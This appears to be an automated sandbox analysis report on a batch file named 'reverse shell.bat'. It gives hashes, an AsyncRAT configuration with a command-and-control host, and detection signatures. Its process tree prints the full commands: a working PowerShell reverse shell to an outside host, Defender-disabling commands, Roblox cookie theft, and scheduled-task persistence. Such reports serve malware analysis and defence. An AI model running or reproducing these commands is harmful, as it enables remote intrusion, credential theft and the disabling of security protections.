Analysis
-
max time kernel
150s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
25-11-2024 12:17
Static task
static1
General
-
Target
reverse shell.bat
-
Size
953B
-
MD5
a34e9091b3cb1b1fddb64dd1e6eafe8b
-
SHA1
73a9ce1190dbf81871d72cc98b7d81487bad17dc
-
SHA256
b79c63a1f5777b977a48085de65f8041d1d6b2d5d569224b0f81b343578f1803
-
SHA512
65391766927605aef01be482578b0f11fc9a9dfd0ee0b0a62ff1df6d07346a4b6d5a0d7409983f3fcd7b8a98e5376fd15bc8961b477be683e88ddf8e5619d0b7
Malware Config
Extracted
asyncrat
Default
technical-southwest.gl.at.ply.gg:58694
-
delay
1
-
install
true
-
install_file
WINDOWS.exe
-
install_folder
%AppData%
Signatures
-
Asyncrat family
-
Detect Umbral payload 2 IoCs
resource yara_rule behavioral1/files/0x0008000000023bbb-22.dat family_umbral behavioral1/memory/1644-31-0x000001EC34B30000-0x000001EC34B70000-memory.dmp family_umbral -
Umbral family
-
Async RAT payload 1 IoCs
resource yara_rule behavioral1/files/0x0008000000023bee-39.dat family_asyncrat -
Blocklisted process makes network request 3 IoCs
flow pid Process 5 3116 powershell.exe 23 3116 powershell.exe 25 3116 powershell.exe -
pid Process 2408 powershell.exe 3216 powershell.exe 1828 powershell.exe 3116 powershell.exe 1608 powershell.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts output.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation Loader.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\output.lnk powershell.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Loader.lnk powershell.exe -
Executes dropped EXE 3 IoCs
pid Process 1644 output.exe 1624 Loader.exe 1608 WINDOWS.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 33 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 3284 cmd.exe 3844 PING.EXE -
Delays execution with timeout.exe 1 IoCs
pid Process 4692 timeout.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2164 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 3844 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 400 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3116 powershell.exe 3116 powershell.exe 1644 output.exe 1644 output.exe 1608 powershell.exe 1608 powershell.exe 1608 powershell.exe 1624 Loader.exe 1624 Loader.exe 1624 Loader.exe 1624 Loader.exe 1624 Loader.exe 1624 Loader.exe 1624 Loader.exe 1624 Loader.exe 1624 Loader.exe 1624 Loader.exe 1624 Loader.exe 1624 Loader.exe 1624 Loader.exe 1624 Loader.exe 1624 Loader.exe 1624 Loader.exe 1624 Loader.exe 1624 Loader.exe 1624 Loader.exe 1624 Loader.exe 1624 Loader.exe 1624 Loader.exe 2408 powershell.exe 2408 powershell.exe 1624 Loader.exe 1624 Loader.exe 2408 powershell.exe 1624 Loader.exe 1624 Loader.exe 1624 Loader.exe 1624 Loader.exe 1624 Loader.exe 1624 Loader.exe 1624 Loader.exe 1624 Loader.exe 1624 Loader.exe 1624 Loader.exe 1624 Loader.exe 1624 Loader.exe 1624 Loader.exe 1624 Loader.exe 1624 Loader.exe 1624 Loader.exe 1624 Loader.exe 1624 Loader.exe 1624 Loader.exe 1624 Loader.exe 1624 Loader.exe 1624 Loader.exe 1624 Loader.exe 1624 Loader.exe 1624 Loader.exe 1624 Loader.exe 1624 Loader.exe 1624 Loader.exe 1624 Loader.exe 1624 Loader.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3116 powershell.exe Token: SeDebugPrivilege 1644 output.exe Token: SeIncreaseQuotaPrivilege 1692 wmic.exe Token: SeSecurityPrivilege 1692 wmic.exe Token: SeTakeOwnershipPrivilege 1692 wmic.exe Token: SeLoadDriverPrivilege 1692 wmic.exe Token: SeSystemProfilePrivilege 1692 wmic.exe Token: SeSystemtimePrivilege 1692 wmic.exe Token: SeProfSingleProcessPrivilege 1692 wmic.exe Token: SeIncBasePriorityPrivilege 1692 wmic.exe Token: SeCreatePagefilePrivilege 1692 wmic.exe Token: SeBackupPrivilege 1692 wmic.exe Token: SeRestorePrivilege 1692 wmic.exe Token: SeShutdownPrivilege 1692 wmic.exe Token: SeDebugPrivilege 1692 wmic.exe Token: SeSystemEnvironmentPrivilege 1692 wmic.exe Token: SeRemoteShutdownPrivilege 1692 wmic.exe Token: SeUndockPrivilege 1692 wmic.exe Token: SeManageVolumePrivilege 1692 wmic.exe Token: 33 1692 wmic.exe Token: 34 1692 wmic.exe Token: 35 1692 wmic.exe Token: 36 1692 wmic.exe Token: SeIncreaseQuotaPrivilege 1692 wmic.exe Token: SeSecurityPrivilege 1692 wmic.exe Token: SeTakeOwnershipPrivilege 1692 wmic.exe Token: SeLoadDriverPrivilege 1692 wmic.exe Token: SeSystemProfilePrivilege 1692 wmic.exe Token: SeSystemtimePrivilege 1692 wmic.exe Token: SeProfSingleProcessPrivilege 1692 wmic.exe Token: SeIncBasePriorityPrivilege 1692 wmic.exe Token: SeCreatePagefilePrivilege 1692 wmic.exe Token: SeBackupPrivilege 1692 wmic.exe Token: SeRestorePrivilege 1692 wmic.exe Token: SeShutdownPrivilege 1692 wmic.exe Token: SeDebugPrivilege 1692 wmic.exe Token: SeSystemEnvironmentPrivilege 1692 wmic.exe Token: SeRemoteShutdownPrivilege 1692 wmic.exe Token: SeUndockPrivilege 1692 wmic.exe Token: SeManageVolumePrivilege 1692 wmic.exe Token: 33 1692 wmic.exe Token: 34 1692 wmic.exe Token: 35 1692 wmic.exe Token: 36 1692 wmic.exe Token: SeDebugPrivilege 1608 powershell.exe Token: SeDebugPrivilege 1624 Loader.exe Token: SeDebugPrivilege 1624 Loader.exe Token: SeDebugPrivilege 2408 powershell.exe Token: SeDebugPrivilege 3216 powershell.exe Token: SeDebugPrivilege 2032 powershell.exe Token: SeIncreaseQuotaPrivilege 1172 wmic.exe Token: SeSecurityPrivilege 1172 wmic.exe Token: SeTakeOwnershipPrivilege 1172 wmic.exe Token: SeLoadDriverPrivilege 1172 wmic.exe Token: SeSystemProfilePrivilege 1172 wmic.exe Token: SeSystemtimePrivilege 1172 wmic.exe Token: SeProfSingleProcessPrivilege 1172 wmic.exe Token: SeIncBasePriorityPrivilege 1172 wmic.exe Token: SeCreatePagefilePrivilege 1172 wmic.exe Token: SeBackupPrivilege 1172 wmic.exe Token: SeRestorePrivilege 1172 wmic.exe Token: SeShutdownPrivilege 1172 wmic.exe Token: SeDebugPrivilege 1172 wmic.exe Token: SeSystemEnvironmentPrivilege 1172 wmic.exe -
Suspicious use of WriteProcessMemory 42 IoCs
description pid Process procid_target PID 4560 wrote to memory of 3116 4560 cmd.exe 84 PID 4560 wrote to memory of 3116 4560 cmd.exe 84 PID 3116 wrote to memory of 1644 3116 powershell.exe 97 PID 3116 wrote to memory of 1644 3116 powershell.exe 97 PID 1644 wrote to memory of 1692 1644 output.exe 101 PID 1644 wrote to memory of 1692 1644 output.exe 101 PID 3116 wrote to memory of 1624 3116 powershell.exe 103 PID 3116 wrote to memory of 1624 3116 powershell.exe 103 PID 1644 wrote to memory of 3660 1644 output.exe 104 PID 1644 wrote to memory of 3660 1644 output.exe 104 PID 1644 wrote to memory of 1608 1644 output.exe 106 PID 1644 wrote to memory of 1608 1644 output.exe 106 PID 1644 wrote to memory of 2408 1644 output.exe 108 PID 1644 wrote to memory of 2408 1644 output.exe 108 PID 1644 wrote to memory of 3216 1644 output.exe 110 PID 1644 wrote to memory of 3216 1644 output.exe 110 PID 1624 wrote to memory of 3192 1624 Loader.exe 112 PID 1624 wrote to memory of 3192 1624 Loader.exe 112 PID 1624 wrote to memory of 2800 1624 Loader.exe 114 PID 1624 wrote to memory of 2800 1624 Loader.exe 114 PID 3192 wrote to memory of 400 3192 cmd.exe 116 PID 3192 wrote to memory of 400 3192 cmd.exe 116 PID 2800 wrote to memory of 4692 2800 cmd.exe 117 PID 2800 wrote to memory of 4692 2800 cmd.exe 117 PID 1644 wrote to memory of 2032 1644 output.exe 118 PID 1644 wrote to memory of 2032 1644 output.exe 118 PID 1644 wrote to memory of 1172 1644 output.exe 120 PID 1644 wrote to memory of 1172 1644 output.exe 120 PID 1644 wrote to memory of 2564 1644 output.exe 122 PID 1644 wrote to memory of 2564 1644 output.exe 122 PID 1644 wrote to memory of 4616 1644 output.exe 124 PID 1644 wrote to memory of 4616 1644 output.exe 124 PID 1644 wrote to memory of 1828 1644 output.exe 126 PID 1644 wrote to memory of 1828 1644 output.exe 126 PID 2800 wrote to memory of 1608 2800 cmd.exe 128 PID 2800 wrote to memory of 1608 2800 cmd.exe 128 PID 1644 wrote to memory of 2164 1644 output.exe 129 PID 1644 wrote to memory of 2164 1644 output.exe 129 PID 1644 wrote to memory of 3284 1644 output.exe 132 PID 1644 wrote to memory of 3284 1644 output.exe 132 PID 3284 wrote to memory of 3844 3284 cmd.exe 134 PID 3284 wrote to memory of 3844 3284 cmd.exe 134 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 3660 attrib.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\reverse shell.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4560 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile -ExecutionPolicy Bypass -Command "$LHOST = 'radio-ebay.gl.at.ply.gg'; $LPORT = 10404; $TCPClient = New-Object Net.Sockets.TCPClient($LHOST, $LPORT); $NetworkStream = $TCPClient.GetStream(); $StreamReader = New-Object IO.StreamReader($NetworkStream); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); $StreamWriter.AutoFlush = $true; $Buffer = New-Object System.Byte[] 1024; while ($TCPClient.Connected) { while ($NetworkStream.DataAvailable) { $RawData = $NetworkStream.Read($Buffer, 0, $Buffer.Length); $Code = ([text.encoding]::UTF8).GetString($Buffer, 0, $RawData -1) }; if ($TCPClient.Connected -and $Code.Length -gt 1) { $Output = try { Invoke-Expression ($Code) } catch { $_ }; $StreamWriter.Write('$Output`n'); $Code = $null } }; $TCPClient.Close(); $NetworkStream.Close(); $StreamReader.Close(); $StreamWriter.Close()"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3116 -
C:\Users\Admin\Desktop\output.exe"C:\Users\Admin\Desktop\output.exe"3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1644 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1692
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\Desktop\output.exe"4⤵
- Views/modifies file attributes
PID:3660
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\output.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1608
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 24⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2408
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:3216
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2032
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1172
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory4⤵PID:2564
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid4⤵PID:4616
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER4⤵
- Command and Scripting Interpreter: PowerShell
PID:1828
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name4⤵
- Detects videocard installed
PID:2164
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\Desktop\output.exe" && pause4⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:3284 -
C:\Windows\system32\PING.EXEping localhost5⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3844
-
-
-
-
C:\Users\Admin\Desktop\Loader.exe"C:\Users\Admin\Desktop\Loader.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1624 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WINDOWS" /tr '"C:\Users\Admin\AppData\Roaming\WINDOWS.exe"' & exit4⤵
- Suspicious use of WriteProcessMemory
PID:3192 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "WINDOWS" /tr '"C:\Users\Admin\AppData\Roaming\WINDOWS.exe"'5⤵
- Scheduled Task/Job: Scheduled Task
PID:400
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpDF25.tmp.bat""4⤵
- Suspicious use of WriteProcessMemory
PID:2800 -
C:\Windows\system32\timeout.exetimeout 35⤵
- Delays execution with timeout.exe
PID:4692
-
-
C:\Users\Admin\AppData\Roaming\WINDOWS.exe"C:\Users\Admin\AppData\Roaming\WINDOWS.exe"5⤵
- Executes dropped EXE
PID:1608
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
1KB
MD5276798eeb29a49dc6e199768bc9c2e71
SHA15fdc8ccb897ac2df7476fbb07517aca5b7a6205b
SHA256cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc
SHA5120d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2
-
Filesize
1KB
MD52984662ba3f86d7fcf26758b5b76754d
SHA1bc2a43ffd898222ee84406313f3834f226928379
SHA256f0815f797b0c1829745dd65985f28d459688f91ceb2f3d76fed2d4309589bcde
SHA512a06251a7a14559ebf5627a3c6b03fda9ded1d4ee44991283c824ccf5011cdf67665696d2d9b23507cbb3e3b9943b9e9f79ef28d3657eb61fb99920225417ab11
-
Filesize
944B
MD577d622bb1a5b250869a3238b9bc1402b
SHA1d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9
-
Filesize
948B
MD5985b3105d8889886d6fd953575c54e08
SHA10f9a041240a344d82bac0a180520e7982c15f3cd
SHA2565178fdd457eb3eb25c8f72ed4c22c582a83de0d324db66d0446d660f226e944d
SHA5120fd59bc4886b70aa3b7eeeaa23229b7fdc93410ca7f8452860e4a1bbda2559eaa5e4b05c3ec2d85f7d648daf3c16741f4c2c18f2dd3bae4cc4a4e57ae4f665b0
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
151B
MD559d271b5196305a5d0f1a5de6da135f6
SHA1d9cc0613b4227c53122c298449aac2ce52b34f83
SHA2567396230cb1fb7ba5a08951509f00919ee51be82f7ae20ef8a2df2c52a03b4578
SHA51266c4c9773152aca642c14fc9d8936fe89a4bcf929d1f3fd6f84eda3a7fe1663f8f7d3b65b7f30bbf6b667ee65b4ae271cc82667be5bfde250615470cbf96ecc5
-
Filesize
63KB
MD57ceb11ebb7a55e33a82bc3b66f554e79
SHA18dfd574ad06ded662d92d81b72f14c1914ac45b5
SHA256aea3e89e45a33441bcd06c990282f8601eb960a641c611222dce2fe09685e603
SHA512d8cd7af50996015163c8926fc7b6df6a6e2c0b3f6c8fcff37cad5b72fed115f7134723d99f61a20576b83e67107a3a410f5ef2312191446b3d0759cb739e6ccd
-
Filesize
227KB
MD596fc8b45a92d736087ac43746a142cf4
SHA135999912f4405f21f5068841581d1e1babf55a4b
SHA256408dca374549b037529ff6b200f1fd3a9105d3f531805213e8750d3f3463ab1a
SHA512b6938308458eab4412d130c1c0f5b5104f1e98ab714f659ee27d8d033dbbf9608c98f592bedcb6ff51f0f8f6a7fd4f6705783e0fbcdc900d743a8bf6416aaa16